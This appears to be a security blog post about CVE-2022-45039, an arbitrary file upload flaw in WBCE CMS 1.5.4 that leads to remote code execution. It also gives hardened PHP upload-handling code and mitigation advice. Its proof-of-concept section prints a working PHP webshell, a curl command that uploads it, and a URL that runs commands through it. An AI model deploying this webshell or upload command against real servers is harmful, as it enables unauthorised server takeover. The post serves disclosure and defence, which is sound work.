WBCE CMS is an open-source content management system written in PHP, designed for simplicity and flexibility. But with flexibility sometimes comes risk. In this post, we're diving deep into a critical vulnerability—CVE-2022-45039—that was found in WBCE CMS version 1.5.4, allowing attackers to upload arbitrary files, including malicious PHP scripts, and potentially take control of the server.
Let’s break everything down in simple terms: how the bug works, what can be done with it, the actual code that exploits it, and how to secure your application.
What is CVE-2022-45039?
CVE-2022-45039 is an arbitrary file upload vulnerability found in the *Server Settings* module of WBCE CMS version 1.5.4. Because file upload handling is not secure, attackers can sneak in a crafted PHP file disguised as something else, and then execute it on the server.
The impact? Remote Code Execution (RCE). With this, hackers can upload a PHP webshell and gain full control over the server.
How the Vulnerability Works
1. Poor File Validation: When uploading files through the Server Settings module, WBCE CMS v1.5.4 doesn’t strictly check the file type or extension.
2. Missing Server-side Checks: The backend does not enforce proper restrictions, allowing files like .php to slip through.
3. Direct File Access: Uploaded files are saved in a public directory, enabling direct access via a web browser.
4. The attacker crafts a malicious PHP file and uploads it.
5. When the attacker visits the uploaded file in their browser, the server executes the malicious PHP code.
Proof-of-Concept Exploit Code
Here's a simple exploit workflow using curl. Let’s say the vulnerable script is at http://target.com/admin/server_settings.php.
1. Prepare a Malicious PHP File
<?php
// simple PHP webshell
if(isset($_REQUEST['cmd'])){
echo "<pre>";
system($_REQUEST['cmd']);
echo "</pre>";
}
?>
*Save it as shell.php.*
2. Upload the File
curl -k -X POST -F "uploaded_file=@shell.php" http://target.com/admin/server_settings.php
Visit
http://target.com/uploads/shell.php?cmd=whoami
- Insecure web root storage: Uploaded files were stored in a web-accessible directory.
- No authentication or authorization checks on upload: Even admins shouldn't be able to upload PHP files.
Mitigation & Remediation
1. Update immediately: Always run the latest WBCE CMS version.
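Beyond updating, the weaknesses described above (loose extension checks, no server-side enforcement, web-root storage) can be closed in the upload handler itself. The following is an added example, not WBCE CMS code or its patch; the function name store_upload, the ALLOWED allowlist, the size limit and the storage path are assumptions made for illustration.

```php
<?php
declare(strict_types=1);
// Added illustration of hardened upload handling. Not WBCE CMS code.
// ALLOWED, MAX_BYTES and the storage directory are assumptions for this example.

const ALLOWED = [            // extension => expected MIME type (allowlist)
    'png' => 'image/png',
    'jpg' => 'image/jpeg',
    'pdf' => 'application/pdf',
];
const MAX_BYTES = 2 * 1024 * 1024;

/**
 * Validate one entry of $_FILES and store it outside the web root.
 * Returns the stored path; throws RuntimeException on any rejection.
 */
function store_upload(array $file, string $storageDir): string
{
    if (($file['error'] ?? UPLOAD_ERR_NO_FILE) !== UPLOAD_ERR_OK) {
        throw new RuntimeException('upload failed');
    }
    // Only accept files that PHP itself received via HTTP POST.
    if (!is_uploaded_file($file['tmp_name'])) {
        throw new RuntimeException('not an uploaded file');
    }
    if ($file['size'] > MAX_BYTES) {
        throw new RuntimeException('file too large');
    }
    // Server-side extension check against an allowlist, never a denylist.
    $ext = strtolower(pathinfo($file['name'], PATHINFO_EXTENSION));
    if (!array_key_exists($ext, ALLOWED)) {
        throw new RuntimeException('extension not allowed');
    }
    // Derive the content type from the bytes, not the client-supplied header.
    $mime = (new finfo(FILEINFO_MIME_TYPE))->file($file['tmp_name']);
    if ($mime !== ALLOWED[$ext]) {
        throw new RuntimeException('content does not match extension');
    }
    // Server-generated name: the client never chooses the stored filename.
    $dest = rtrim($storageDir, '/') . '/' . bin2hex(random_bytes(16)) . '.' . $ext;
    if (!move_uploaded_file($file['tmp_name'], $dest)) {
        throw new RuntimeException('could not store file');
    }
    return $dest;
}

// Usage (placeholder path): the storage directory must sit outside the document root.
// $path = store_upload($_FILES['uploaded_file'], '/var/lib/cms-uploads');
```

The caller is still responsible for authenticating and authorizing the request before calling the function. If uploads must remain web-accessible, configure the web server so that the upload directory is served as static content only and never passed to the PHP interpreter.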
Conclusion
CVE-2022-45039 is a classic example of why web app developers should *never* trust file uploads. If you’re running WBCE CMS v1.5.4, you’re at risk for remote code execution. Patch now, review file upload handlers, and restrict upload directories.
From hobby sites to critical business platforms, keeping your CMS secure should always be a top priority.
Timeline
Published on: 11/25/2022 16:15:00 UTC
Last modified on: 11/28/2022 21:07:00 UTC